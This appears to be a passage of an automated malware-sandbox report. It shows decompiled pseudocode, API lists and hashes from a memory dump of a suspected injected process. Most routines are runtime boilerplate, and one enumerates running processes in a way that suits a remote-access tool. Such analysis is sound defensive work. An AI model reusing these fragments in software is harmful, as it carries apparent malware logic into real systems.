                    																					 *0x4574c8(_t432);
                    																					_t299 =  *((intOrPtr*)( *_t200))();
                    																					_t396 = _v732;
                    																					__eflags = _t299;
                    																					if(_t299 == 0) {
                    																						__eflags = _t396 - 0x46f2a8;
                    																						if(_t396 != 0x46f2a8) {
                    																							_t456 = _t364 + _t364;
                    																							__eflags = _t456;
                    																							asm("lock xadd [eax], ecx");
                    																							if(_t456 != 0) {
                    																								goto L126;
                    																							} else {
                    																								_t218 = _t456 * 8; // 0x30ff068b
                    																								E00445002( *((intOrPtr*)(_t432 + _t218 + 0x28)));
                    																								_t221 = _t456 * 8; // 0x30ff0c46
                    																								E00445002( *((intOrPtr*)(_t432 + _t221 + 0x24)));
                    																								_t224 = _t364 * 4; // 0xcea3
                    																								E00445002( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
                    																								_t399 = _v712;
                    																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
                    																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
                    																							}
                    																						}
                    																						_t397 = _v740;
                    																						 *_t397 = 1;
                    																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
                    																					} else {
                    																						 *(_v724 + _t432) = _t396;
                    																						_t205 = _t364 * 4; // 0xcea3
                    																						E00445002( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
                    																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
                    																						E00445002(_v740);
                    																						 *(_t432 + 8) = _v748;
                    																						goto L84;
                    																					}
                    																					goto L85;
                    																				}
                    																			}
                    																		} else {
                    																			goto L85;
                    																		}
                    																		goto L130;
                    																	}
                    																	asm("sbb eax, eax");
                    																	_t282 = _t281 | 0x00000001;
                    																	__eflags = _t282;
                    																	goto L93;
                    																} else {
                    																	L84:
                    																	__eflags = 0;
                    																	L85:
                    																	__eflags = _v16 ^ _t465;
                    																	return E004338BB(_v16 ^ _t465);
                    																}
                    															} else {
                    																_t330 = _t447 + _t447;
                    																__eflags = _t330 - 0x106;
                    																if(_t330 >= 0x106) {
                    																	E004339EF();
                    																	goto L82;
                    																} else {
                    																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
                    																	_t332 =  &_v276;
                    																	_push(_t332);
                    																	_push(_v460);
                    																	_push(_t428);
                    																	L83();
                    																	_t472 = _t475 + 0xc;
                    																	__eflags = _t332;
                    																	_t268 = _v452;
                    																	if(_t332 != 0) {
                    																		_t268 = _t268 + 1;
                    																		_v452 = _t268;
                    																	}
                    																	L54:
                    																	_t444 = _t359 + _t447 * 2;
                    																	_t370 = 0;
                    																	__eflags =  *_t444;
                    																	if( *_t444 == 0) {
                    																		L56:
                    																		__eflags = _t268;
                    																		L77:
                    																		if(__eflags != 0) {
                    																			goto L79;
                    																		} else {
                    																		}
                    																		goto L80;
                    																	} else {
                    																		_t444 = _t444 + 2;
                    																		__eflags =  *_t444;
                    																		if( *_t444 != 0) {
                    																			continue;
                    																		} else {
                    																			goto L56;
                    																		}
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t333 = 0x3b;
                    														__eflags =  *_t359 - _t333;
                    														if( *_t359 != _t333) {
                    															break;
                    														} else {
                    															goto L48;
                    														}
                    													}
                    												}
                    											}
                    											goto L130;
                    										}
                    										goto L80;
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						__eflags = _t444;
                    						if(_t444 != 0) {
                    							_push(_t444);
                    							_push(_t249);
                    							_push(_t428);
                    							L83();
                    						}
                    						L80:
                    						__eflags = _v12 ^ _t463;
                    						return E004338BB(_v12 ^ _t463);
                    					}
                    				}
                    				L130:
                    			}
                    0x00443a93
                    0x00443a97
                    0x00443a98
                    0x00443a9b
                    0x00443aab
                    0x00443ab7
                    0x00443ace
                    0x00443ad3
                    0x00443ad6
                    0x00443ad8
                    0x00443aed
                    0x00443af0
                    0x00443af0
                    0x00443af3
                    0x00443af9
                    0x00443b02
                    0x00443b04
                    0x00443b07
                    0x00443b0e
                    0x00443b11
                    0x00443b17
                    0x00000000
                    0x00000000
                    0x00443b19
                    0x00443b1d
                    0x00443b46
                    0x00443b46
                    0x00443b1f
                    0x00443b1f
                    0x00443b23
                    0x00443b27
                    0x00443b2e
                    0x00443b34
                    0x00000000
                    0x00443b36
                    0x00443b36
                    0x00443b39
                    0x00443b3c
                    0x00443b44
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00443b44
                    0x00443b34
                    0x00443b53
                    0x00443b53
                    0x00443b55
                    0x00443b5b
                    0x00443b61
                    0x00443b64
                    0x00443b64
                    0x00443b67
                    0x00443b6a
                    0x00443b6a
                    0x00443b7a
                    0x00443b88
                    0x00443b8d
                    0x00443b94
                    0x00443b96
                    0x00000000
                    0x00443b9c
                    0x00443ba2
                    0x00443ba8
                    0x00443baf
                    0x00443bb5
                    0x00443bb8
                    0x00443bbe
                    0x00443bcb
                    0x00443bd2
                    0x00443bd7
                    0x00443bda
                    0x00443bdc
                    0x00443e35
                    0x00443e3b
                    0x00443e3c
                    0x00443e3d
                    0x00443e3e
                    0x00443e3f
                    0x00443e40
                    0x00443e45
                    0x00443e46
                    0x00443e4b
                    0x00443be2
                    0x00443be2
                    0x00443bf0
                    0x00443bf3
                    0x00443c0e
                    0x00443c15
                    0x00443c1b
                    0x00443c21
                    0x00443bf5
                    0x00443bf5
                    0x00443bfd
                    0x00000000
                    0x00443bff
                    0x00443bff
                    0x00443c05
                    0x00443c05
                    0x00443bfd
                    0x00443c28
                    0x00443c2b
                    0x00443d48
                    0x00443d4b
                    0x00443d58
                    0x00443d5b
                    0x00443d63
                    0x00443d63
                    0x00443d4d
                    0x00443d53
                    0x00443d53
                    0x00443c31
                    0x00443c31
                    0x00443c37
                    0x00443c3f
                    0x00443c41
                    0x00443c44
                    0x00443c4d
                    0x00443c56
                    0x00443c5c
                    0x00443c5c
                    0x00443c5f
                    0x00443c61
                    0x00000000
                    0x00000000
                    0x00443c63
                    0x00443c69
                    0x00443c6a
                    0x00443c75
                    0x00443c7d
                    0x00443c85
                    0x00443c88
                    0x00443c8b
                    0x00443c91
                    0x00443c97
                    0x00443c9d
                    0x00443ca3
                    0x00443ca6
                    0x00000000
                    0x00000000
                    0x00443ca8
                    0x00443ccd
                    0x00443ccd
                    0x00443cd0
                    0x00443cd4
                    0x00443ced
                    0x00443cf2
                    0x00443cf5
                    0x00443cf7
                    0x00443cfd
                    0x00443d38
                    0x00443cff
                    0x00443cff
                    0x00443d04
                    0x00443d0c
                    0x00443d0d
                    0x00443d0d
                    0x00443d24
                    0x00443d2b
                    0x00443d2e
                    0x00443d33
                    0x00443d33
                    0x00443d3b
                    0x00443d3e
                    0x00443d3e
                    0x00443d43
                    0x00000000
                    0x00443d43
                    0x00443caa
                    0x00443cac
                    0x00443cb1
                    0x00443cb7
                    0x00443cc0
                    0x00443cc9
                    0x00443cc9
                    0x00000000
                    0x00443cac
                    0x00443d66
                    0x00443d66
                    0x00443d6a
                    0x00443d72
                    0x00443d78
                    0x00443d7b
                    0x00443d81
                    0x00443d83
                    0x00443dc3
                    0x00443dc9
                    0x00443dd0
                    0x00443dd0
                    0x00443dd6
                    0x00443dda
                    0x00000000
                    0x00443ddc
                    0x00443ddc
                    0x00443de0
                    0x00443de5
                    0x00443de9
                    0x00443dee
                    0x00443df5
                    0x00443e03
                    0x00443e09
                    0x00443e0c
                    0x00443e0c
                    0x00443dda
                    0x00443e1b
                    0x00443e23
                    0x00443e2c
                    0x00443d85
                    0x00443d8b
                    0x00443d8e
                    0x00443d95
                    0x00443da7
                    0x00443dae
                    0x00443dbb
                    0x00000000
                    0x00443dbb
                    0x00000000
                    0x00443d83
                    0x00443bdc
                    0x00443b57
                    0x00000000
                    0x00443b57
                    0x00000000
                    0x00443b55
                    0x00443b4e
                    0x00443b50
                    0x00443b50
                    0x00000000
                    0x00443ada
                    0x00443ada
                    0x00443ada
                    0x00443adc
                    0x00443ae1
                    0x00443aec
                    0x00443aec
                    0x00443903
                    0x00443903
                    0x00443906
                    0x0044390b
                    0x00443a68
                    0x00000000
                    0x00443911
                    0x00443913
                    0x0044391b
                    0x00443921
                    0x00443922
                    0x00443928
                    0x00443929
                    0x0044392e
                    0x00443931
                    0x00443933
                    0x00443939
                    0x0044393b
                    0x0044393c
                    0x0044393c
                    0x0044394a
                    0x0044394a
                    0x0044394d
                    0x0044394f
                    0x00443952
                    0x00443960
                    0x00443960
                    0x00443a4a
                    0x00443a4a
                    0x00000000
                    0x00443a4c
                    0x00443a4c
                    0x00000000
                    0x00443954
                    0x00443954
                    0x00443957
                    0x0044395a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044395a
                    0x00443952
                    0x0044390b
                    0x004438fd
                    0x004438d0
                    0x004438d2
                    0x004438d3
                    0x004438d6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004438d6
                    0x004438ce
                    0x00443856
                    0x00000000
                    0x0044384a
                    0x00000000
                    0x00443967
                    0x0044381d
                    0x00443812
                    0x00443807
                    0x004437c0
                    0x004437c0
                    0x004437c2
                    0x004437c4
                    0x004437c5
                    0x004437c6
                    0x004437c7
                    0x004437cc
                    0x00443a57
                    0x00443a5c
                    0x00443a67
                    0x00443a67
                    0x004437be
                    0x00000000

                    APIs
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    • _free.LIBCMT ref: 00443707
                    • _free.LIBCMT ref: 0044371E
                    • _free.LIBCMT ref: 0044373D
                    • _free.LIBCMT ref: 00443758
                    • _free.LIBCMT ref: 0044376F
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$AllocateHeap
                    • String ID:
                    • API String ID: 3033488037-0
                    • Opcode ID: b7604e1a15de5c4975e1a22ca13a47cbde8c9eaf56ddf4bc19a35e3347dcf454
                    • Instruction ID: 33fd527e9c34fc99befeee23a18cff77bba5ae58738d28a8d8759c9d181ac574
                    • Opcode Fuzzy Hash: b7604e1a15de5c4975e1a22ca13a47cbde8c9eaf56ddf4bc19a35e3347dcf454
                    • Instruction Fuzzy Hash: 1F51F6B1A00705AFEB20DF2AC841A6AB7F4EF45B25F14416FE849D7351E739DA01CB88
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E00447BE5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				int _v8;
                    				int _v12;
                    				int _v16;
                    				int _v20;
                    				signed int _v56;
                    				char _v268;
                    				intOrPtr _v272;
                    				char _v276;
                    				char _v312;
                    				char _v316;
                    				void* __ebp;
                    				void* _t36;
                    				signed int _t38;
                    				signed int _t42;
                    				signed int _t50;
                    				void* _t54;
                    				void* _t56;
                    				signed int* _t61;
                    				intOrPtr _t71;
                    				void* _t78;
                    				signed int _t85;
                    				signed int _t87;
                    				signed int _t89;
                    				int _t93;
                    				char** _t96;
                    				signed int _t100;
                    				signed int _t101;
                    				signed int _t106;
                    				signed int _t107;
                    				intOrPtr _t116;
                    				intOrPtr _t118;
                    
                    				_t88 = __edi;
                    				_t96 = E0044764F();
                    				_v8 = 0;
                    				_v12 = 0;
                    				_v16 = 0;
                    				_t36 = E004476AD( &_v8);
                    				_pop(_t78);
                    				if(_t36 != 0) {
                    					L19:
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E0043A5E8();
                    					asm("int3");
                    					_t106 = _t107;
                    					_t38 =  *0x46f00c; // 0x54ba778e
                    					_v56 = _t38 ^ _t106;
                    					 *0x46f344 =  *0x46f344 | 0xffffffff;
                    					 *0x46f338 =  *0x46f338 | 0xffffffff;
                    					_push(0);
                    					_push(_t96);
                    					_t77 = "TZ";
                    					_t89 = 0;
                    					 *0x470758 = 0;
                    					_t42 = E0043A9B5(__eflags,  &_v316,  &_v312, 0x100, "TZ");
                    					__eflags = _t42;
                    					if(_t42 != 0) {
                    						__eflags = _t42 - 0x22;
                    						if(_t42 == 0x22) {
                    							_t101 = E00444A38(_t78, _v272);
                    							__eflags = _t101;
                    							if(__eflags != 0) {
                    								_t50 = E0043A9B5(__eflags,  &_v276, _t101, _v272, _t77);
                    								__eflags = _t50;
                    								if(_t50 == 0) {
                    									E00445002(0);
                    									_t89 = _t101;
                    								} else {
                    									_push(_t101);
                    									goto L25;
                    								}
                    							} else {
                    								_push(0);
                    								L25:
                    								E00445002();
                    							}
                    						}
                    					} else {
                    						_t89 =  &_v268;
                    					}
                    					asm("sbb esi, esi");
                    					_t100 =  ~(_t89 -  &_v268) & _t89;
                    					__eflags = _t89;
                    					if(__eflags == 0) {
                    						L33:
                    						E00447BE5(_t77, _t89, _t100, __eflags);
                    					} else {
                    						__eflags =  *_t89;
                    						if(__eflags == 0) {
                    							goto L33;
                    						} else {
                    							_push(_t89);
                    							E00447A10(_t77, _t89, _t100, __eflags);
                    						}
                    					}
                    					E00445002(_t100);
                    					__eflags = _v12 ^ _t106;
                    					return E004338BB(_v12 ^ _t106);
                    				} else {
                    					_t54 = E00447655( &_v12);
                    					_pop(_t78);
                    					if(_t54 != 0) {
                    						goto L19;
                    					} else {
                    						_t56 = E00447681( &_v16);
                    						_pop(_t78);
                    						if(_t56 != 0) {
                    							goto L19;
                    						} else {
                    							E00445002( *0x470750);
                    							 *0x470750 = 0;
                    							 *_t107 = 0x470760;
                    							if(GetTimeZoneInformation(??) != 0xffffffff) {
                    								_t85 =  *0x470760 * 0x3c;
                    								_t87 =  *0x4707b4; // 0x0
                    								_push(__edi);
                    								 *0x470758 = 1;
                    								_v8 = _t85;
                    								_t116 =  *0x4707a6; // 0x0
                    								if(_t116 != 0) {
                    									_v8 = _t85 + _t87 * 0x3c;
                    								}
                    								_t118 =  *0x4707fa; // 0x0
                    								if(_t118 == 0) {
                    									L9:
                    									_v12 = 0;
                    									_v16 = 0;
                    								} else {
                    									_t71 =  *0x470808; // 0x0
                    									if(_t71 == 0) {
                    										goto L9;
                    									} else {
                    										_v12 = 1;
                    										_v16 = (_t71 - _t87) * 0x3c;
                    									}
                    								}
                    								_t93 = E00444607(0, _t87);
                    								if(WideCharToMultiByte(_t93, 0, 0x470764, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                    									 *( *_t96) = 0;
                    								} else {
                    									( *_t96)[0x3f] = 0;
                    								}
                    								if(WideCharToMultiByte(_t93, 0, 0x4707b8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                    									 *(_t96[1]) = 0;
                    								} else {
                    									_t96[1][0x3f] = 0;
                    								}
                    							}
                    							 *(E00447649()) = _v8;
                    							 *(E0044763D()) = _v12;
                    							_t61 = E00447643();
                    							 *_t61 = _v16;
                    							return _t61;
                    						}
                    					}
                    				}
                    			}

                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D204), ref: 00447C4F
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00470764,000000FF,00000000,0000003F,00000000,?,?), ref: 00447CC7
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004707B8,000000FF,?,0000003F,00000000,?), ref: 00447CF4
                    • _free.LIBCMT ref: 00447C3D
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 00447E09
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                    • String ID:
                    • API String ID: 1286116820-0
                    • Opcode ID: 192cb104f115433a19df37c8a32fadc6d02125d47b70fccf30c1571d909818d4
                    • Instruction ID: b174790296e1c1cb64190fb610b95ef3deb4325f3671f118df16a2f4d1cf92b6
                    • Opcode Fuzzy Hash: 192cb104f115433a19df37c8a32fadc6d02125d47b70fccf30c1571d909818d4
                    • Instruction Fuzzy Hash: 97511871D04209EBEB14EF79DC819AA77B8EF40324F11026FE455E3291E7389D428B9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E0040EE40(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                    				char _v540;
                    				char _v568;
                    				void* _v572;
                    				void* _v584;
                    				char _v604;
                    				void* _v608;
                    				char _v628;
                    				void* _v632;
                    				char _v652;
                    				void* _v656;
                    				char _v676;
                    				void* _v680;
                    				char _v700;
                    				void* _v704;
                    				char _v724;
                    				void* _v728;
                    				char _v748;
                    				void* _v752;
                    				char _v772;
                    				void* _v776;
                    				char _v796;
                    				void* _v800;
                    				char _v820;
                    				void* _v824;
                    				char _v844;
                    				void* _v848;
                    				char _v868;
                    				void* _v872;
                    				char _v892;
                    				void* _v896;
                    				char _v912;
                    				char _v916;
                    				void* _v920;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				int _t45;
                    				void* _t50;
                    				void* _t51;
                    				void* _t53;
                    				void* _t133;
                    				void* _t134;
                    
                    				_t120 = __edx;
                    				_t81 = __ecx;
                    				_t80 = __ebx;
                    				_t133 = __ecx;
                    				E004020BF(__ebx, __ecx);
                    				 *0x472ae4 = E0041AB12(_t81);
                    				_t134 = CreateToolhelp32Snapshot(2, 0);
                    				if(_t134 != 0) {
                    					_v568 = 0x22c;
                    					_push( &_v568);
                    					Process32FirstW(_t134);
                    					_t45 = Process32NextW(_t134,  &_v572);
                    					_t138 = _t45;
                    					if(_t45 != 0) {
                    						do {
                    							E0040415E(__ebx,  &_v912, _t120, 0x465488,  &_v540);
                    							_t50 = E0041A6E9(_t80,  &_v604, E0041AB40(_v572) & 0x000000ff);
                    							_t51 = E0041A6E9(_t80,  &_v628, _v572);
                    							_t53 = E0041A879(_t80,  &_v676, E0041AB76( &_v652, _v572));
                    							_t120 = E00402E81( &_v868, E00408832(_t80,  &_v844, E00402E81( &_v820, E00408832(_t80,  &_v796, E00402E81( &_v772, E00408832(_t80,  &_v748, E004087CF(_t80,  &_v724, _t133, 0x465488, _t138, E0041A879(_t80,  &_v700,  &_v916)), _t133, 0x465488, _t138, 0x465488), _t53), _t133, 0x465488, _t138, 0x465488), _t51), _t133, 0x465488, _t138, 0x465488), _t50);
                    							E00401FC2(_t133, _t61, _t134, E00408832(_t80,  &_v892, _t61, _t133, 0x465488, _t138, "|"));
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401EE9();
                    							E00401FB8();
                    							E00401FB8();
                    							E00401EE9();
                    						} while (Process32NextW(_t134,  &_v584) != 0);
                    					}
                    					CloseHandle(_t134);
                    				}
                    				return _t133;
                    			}

                    APIs
                      • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EE5E
                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040EE82
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040EE91
                    • CloseHandle.KERNEL32(00000000), ref: 0040F048
                      • Part of subcall function 0041AB40: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040EB16,00000000,?,?,00473280), ref: 0041AB55
                      • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F039
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                    • String ID:
                    • API String ID: 1735047541-0
                    • Opcode ID: 83793ca1565dacf0b6b2b1276a802b59890683215be18fc75706178601a3eb30
                    • Instruction ID: fc5c85540f889f3a2ab1a6016a9079e2269e38591cc5ac43cbc88825ef87a1e7
                    • Opcode Fuzzy Hash: 83793ca1565dacf0b6b2b1276a802b59890683215be18fc75706178601a3eb30
                    • Instruction Fuzzy Hash: CD4142311082415BC324F761DC91AEFB3E9AFD4344F50493EF48A921E2EF38A94AC65A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E00442719(signed int* __ecx, signed int __edx) {
                    				signed int _v8;
                    				intOrPtr* _v12;
                    				signed int _v16;
                    				signed int _t28;
                    				signed int _t29;
                    				intOrPtr _t33;
                    				signed int _t37;
                    				signed int _t38;
                    				signed int _t40;
                    				void* _t50;
                    				signed int _t56;
                    				intOrPtr* _t57;
                    				signed int _t68;
                    				signed int _t71;
                    				signed int _t72;
                    				signed int _t74;
                    				signed int _t75;
                    				signed int _t78;
                    				signed int _t80;
                    				signed int* _t81;
                    				signed int _t85;
                    				void* _t86;
                    
                    				_t72 = __edx;
                    				_v12 = __ecx;
                    				_t28 =  *__ecx;
                    				_t81 =  *_t28;
                    				if(_t81 != 0) {
                    					_t29 =  *0x46f00c; // 0x54ba778e
                    					_t56 =  *_t81 ^ _t29;
                    					_t78 = _t81[1] ^ _t29;
                    					_t83 = _t81[2] ^ _t29;
                    					asm("ror edi, cl");
                    					asm("ror esi, cl");
                    					asm("ror ebx, cl");
                    					if(_t78 != _t83) {
                    						L14:
                    						 *_t78 = E004425DA( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                    						_t33 = E00432C79(_t56);
                    						_t57 = _v12;
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                    						_t24 = _t78 + 4; // 0x4
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00432C79(_t24);
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00432C79(_t83);
                    						_t37 = 0;
                    						L15:
                    						return _t37;
                    					}
                    					_t38 = 0x200;
                    					_t85 = _t83 - _t56 >> 2;
                    					if(_t85 <= 0x200) {
                    						_t38 = _t85;
                    					}
                    					_t80 = _t38 + _t85;
                    					if(_t80 == 0) {
                    						_t80 = 0x20;
                    					}
                    					if(_t80 < _t85) {
                    						L9:
                    						_push(4);
                    						_t80 = _t85 + 4;
                    						_push(_t80);
                    						_v8 = E0044E355(_t56);
                    						_t40 = E00445002(0);
                    						_t68 = _v8;
                    						_t86 = _t86 + 0x10;
                    						if(_t68 != 0) {
                    							goto L11;
                    						}
                    						_t37 = _t40 | 0xffffffff;
                    						goto L15;
                    					} else {
                    						_push(4);
                    						_push(_t80);
                    						_v8 = E0044E355(_t56);
                    						E00445002(0);
                    						_t68 = _v8;
                    						_t86 = _t86 + 0x10;
                    						if(_t68 != 0) {
                    							L11:
                    							_t56 = _t68;
                    							_v8 = _t68 + _t85 * 4;
                    							_t83 = _t68 + _t80 * 4;
                    							_t78 = _v8;
                    							_push(0x20);
                    							asm("ror eax, cl");
                    							_t71 = _t78;
                    							_v16 = 0 ^  *0x46f00c;
                    							asm("sbb edx, edx");
                    							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                    							_v8 = _t74;
                    							if(_t74 == 0) {
                    								goto L14;
                    							}
                    							_t75 = _v16;
                    							_t50 = 0;
                    							do {
                    								_t50 = _t50 + 1;
                    								 *_t71 = _t75;
                    								_t71 = _t71 + 4;
                    							} while (_t50 != _v8);
                    							goto L14;
                    						}
                    						goto L9;
                    					}
                    				}
                    				return _t28 | 0xffffffff;
                    			}


























                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: c116326db574ec4ac976eebbd44619f729e5691f91e73ba179bd56b8a01ad2b5
                    • Instruction ID: 2285a7be470c23e98719e3e167ac4dd42b0d3d2551702f58938e7795a41d704d
                    • Opcode Fuzzy Hash: c116326db574ec4ac976eebbd44619f729e5691f91e73ba179bd56b8a01ad2b5
                    • Instruction Fuzzy Hash: E941F332E002009FEB10DF79C981A5EB3B5EF89714F5581AEE915EB381DBB5AD01CB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E0044F9AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                    				signed int _v8;
                    				int _v12;
                    				char _v16;
                    				intOrPtr _v24;
                    				char _v28;
                    				void* _v40;
                    				signed int _t34;
                    				signed int _t40;
                    				int _t46;
                    				int _t53;
                    				void* _t55;
                    				int _t57;
                    				signed int _t63;
                    				int _t67;
                    				short* _t69;
                    				signed int _t70;
                    				short* _t71;
                    
                    				_t34 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t34 ^ _t70;
                    				E004390B7(__ebx,  &_v28, __edx, _a4);
                    				_t57 = _a24;
                    				if(_t57 == 0) {
                    					_t53 =  *(_v24 + 8);
                    					_t57 = _t53;
                    					_a24 = _t53;
                    				}
                    				_t67 = 0;
                    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                    				_v12 = _t40;
                    				if(_t40 == 0) {
                    					L15:
                    					if(_v16 != 0) {
                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                    					}
                    					return E004338BB(_v8 ^ _t70);
                    				}
                    				_t55 = _t40 + _t40;
                    				asm("sbb eax, eax");
                    				if((_t55 + 0x00000008 & _t40) == 0) {
                    					_t69 = 0;
                    					L11:
                    					if(_t69 != 0) {
                    						E00435760(_t67, _t69, _t67, _t55);
                    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                    						if(_t46 != 0) {
                    							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                    						}
                    					}
                    					L14:
                    					E00434713(_t69);
                    					goto L15;
                    				}
                    				asm("sbb eax, eax");
                    				_t48 = _t40 & _t55 + 0x00000008;
                    				_t63 = _t55 + 8;
                    				if((_t40 & _t55 + 0x00000008) > 0x400) {
                    					asm("sbb eax, eax");
                    					_t69 = E00444A38(_t63, _t48 & _t63);
                    					if(_t69 == 0) {
                    						goto L14;
                    					}
                    					 *_t69 = 0xdddd;
                    					L9:
                    					_t69 =  &(_t69[4]);
                    					goto L11;
                    				}
                    				asm("sbb eax, eax");
                    				E00455A90();
                    				_t69 = _t71;
                    				if(_t69 == 0) {
                    					goto L14;
                    				}
                    				 *_t69 = 0xcccc;
                    				goto L9;
                    			}





















                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042C60C,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C), ref: 0044F9F9
                    • __alloca_probe_16.LIBCMT ref: 0044FA31
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042C60C,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C,?), ref: 0044FA82
                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C,?,00000002,00000000), ref: 0044FA94
                    • __freea.LIBCMT ref: 0044FA9D
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                    • String ID:
                    • API String ID: 313313983-0
                    • Opcode ID: e30088a7f1d1453c4e6029d37d92c7a58ce3ccc3468233c635f768e2873a9a9e
                    • Instruction ID: c39bf728e7cf4935227f6dd7d506cca849d0501c7d5e8428f05d5abeab6cc89e
                    • Opcode Fuzzy Hash: e30088a7f1d1453c4e6029d37d92c7a58ce3ccc3468233c635f768e2873a9a9e
                    • Instruction Fuzzy Hash: 2631E372A0020AABEF249F65DC41DAF7BA5EB40314F04057AFC08E7251E739DD59CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00411C1E(void* __eflags) {
                    				char _v524;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t6;
                    				void* _t7;
                    				void* _t8;
                    				signed int _t9;
                    				void* _t11;
                    				char _t16;
                    				void* _t19;
                    				void* _t20;
